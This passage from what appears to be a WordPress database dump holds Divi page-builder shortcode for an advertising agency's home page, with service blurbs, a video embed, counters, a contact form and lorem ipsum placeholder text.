body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:07:20','2020-08-07 20:07:20','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(589,1,'2020-08-07 20:08:28','2020-08-07 20:08:28','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut 